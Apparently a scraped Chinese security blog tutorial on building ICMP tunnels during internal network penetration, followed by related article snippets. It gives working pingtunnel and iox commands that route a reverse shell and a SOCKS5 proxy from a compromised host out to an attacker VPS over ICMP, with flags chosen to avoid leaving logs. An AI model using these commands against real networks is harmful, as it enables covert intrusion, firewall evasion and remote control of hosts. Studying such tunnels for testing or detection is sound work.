<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    icmp 隧道代理搭建

    VSole2022-08-07 20:17:09

    簡介

    在內網滲透中,內網隧道的搭建是必不可少的。有條件的情況下,優先使用tcp隧道,比較穩定可靠。但是遇到只有icmp協議出網的時候,就需要利用別的思路了。

    ICMP代理

    兩臺機器之間,只允許icmp 協議通訊,其他的協議tcp/udp 不允許,那么可以考慮利用icmp 隧道進行穿透。

    常見的icmp 工具有

    icmpshPingTunnelicmptunnelpowershell icmp
    

    在不同的場景中需要用到不同的工具來進行穿透。

    實驗1 利用icmp協議反彈shell:

    單向主機出網,使用icmp 反彈shell

    使用工具:

    pingtunnel(https://github.com/esrrhs/pingtunnel)

    拓撲環境圖下,Attack 為公網vps,攻擊機,然后內網web 主機僅能ping通attack

    首先在vps 執行

    echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
    

    然后下載pingtunnel 作為Server 端,key代表了密鑰

    sudo ./pingtunnel -type server -key 457864
    

    在被控主機Client執行

    ./pingtunnel -type client -l :4455 -s 47.x.x.x -t 47.x.x.x:8888 -tcp 1 -key 457864
    

    以上意思就是客戶端監聽本地的4455 端口,指定服務端IP為47.x.x.x,然后將本地端口4455 的流量轉發

    到47.x.x.x的8888 端口。

    在Server 使用nc 監聽8888 端口

    Client 執行反彈shell的命令,反彈到本地的4455 端口

    此時Server 獲取到nc的shell

    可以看到此時的流量均為icmp

    實驗2 使用 iox + pingtunnel 搭建隧道

    首先在服務端運行一下命令

    ./pingtunnel -type server -key 457864 //開啟pingtunnel 服務端./iox proxy -l 8898 -l 1080 //開啟iox,將8898 收到的請求轉發到1080 端口
    

    在Client執行以下命令,注意需要增加noprint 和nolog命令,避免在客戶端產生大量的日志信息

    ./pingtunnel -type client -l 127.0.0.1:9999 -s 47.x.x.x -t 47.x.x.x:8898 -sock5 -1 -noprint 1 -nolog 1 -key 457864./iox proxy -r 127.0.0.1:9999 //將代理流量轉發到9999
    

    然后再本地配置代理 socks5://47.x.x.x:1080 然后就可以訪問內網的IP

    icmp
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    ICMPWatch是一款功能強大的ICMP數據包嗅探工具,該工具基于Python 3開發,可以幫助廣大研究人員捕捉和分析ICMP(Internet控制報文協議)數據包。該工具能提供有關捕捉數據包的詳細信息,包括數據包源IP地址、目標IP地址、MAC地址、ICMP類型以及Payload數據等。除此之外,該工具還支持將捕捉到的數據包存儲到SQLite數據庫中,并以pcap格式保存。
    icmp 隧道代理搭建
    2022-08-07 20:17:09
    簡介 在內網滲透中,內網隧道的搭建是必不可少的。有條件的情況下,優先使用tcp隧道,比較穩定可靠。但是遇到只有icmp協議出網的時候,就需要利用別的思路了。ICMP代理 兩臺機器之間,只允許icmp 協議通訊,其他的協議tcp/udp 不允許,那么可以考慮利用icmp 隧道進行穿透。
    ICMP隧道攻擊
    2022-04-27 21:50:29
    ICMP一般用于檢測網絡的可通性
    ICMP協議通常用來測試網絡通不通、主機可不可達、路由可不可用。宅男們打游戲時也常用來ping一下,看看延遲高不高,太高迅雷就得關一關了。 而網絡攻擊者通過ICMP協議,可以進行隧道傳輸,實現數據竊取,規避掉一些防火墻規則。 如何檢測這種隧道?用傳統的簽名無法對抗負載加密,復雜的統計比對讓檢測引擎不堪重負,準確率也不高。 而基于ICMP常規的通訊數據和攻擊時產生的畸形數據,利用信息熵來分析,
    它是TCP/IP協議簇的一個子協議,用于在IP主機、路由器之間傳遞控制消息。這些控制消息雖然并不傳輸用戶數據,但是對于用戶數據的傳遞起著重要的作用ICMP協議主要提供兩種功能,一種是差錯報文,一種是信息類報文。標識符和序號字段分別是16 位的字段。對于標識符,應用程序執行期間送出的所有報文里填入相同的值。例如,icmptunnel會在所有的ICMP payload前添加”TUNL”標記來識別隧道。
    使用 ICMP 傳遞 shellcode
    2021-02-17 21:59:14
    在研究不同的滲透方法時,我遇到了一種利用DNS的技術。在編寫概念證明代碼時,我注意到實現的ping函數很有趣。我們可以提供一個可容納65,500字節的緩沖區。由于大小限制很大,我們可以將shellcode加載到我們的ICMP請求中,然后將其注入到目標的進程中。
    近期,觀成科技安全研究團隊在現網中檢測到了利用Gost工具實現加密隧道的攻擊行為。
    一個ICMP報文包括IP報頭、ICMP報頭和ICMP報文。當IP報頭中的協議字段值為1時,就說明這是一個ICMP報文。
    關于QueenSonoQueenSono是一款針對ICMP協議的數據提取工具,該工具基于Golang開發,并且只依賴于ICMP協議不受監控這一事實實現其功能。除此之外,該工具也可以用于基本的ICMP檢查,或繞過某些身份驗證機制,比如說許多公共Wi-Fi在連接到Wi-Fi后用于對用戶進行身份驗證。工具安裝從源碼安裝廣大研究人員可以直接使用下列命令將該項目源碼克隆至本地
    ping 使用 ICMP 協議, ICMP 工作在 IP層所以無端口號, 當多個進程使用ICMP 的時候,
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类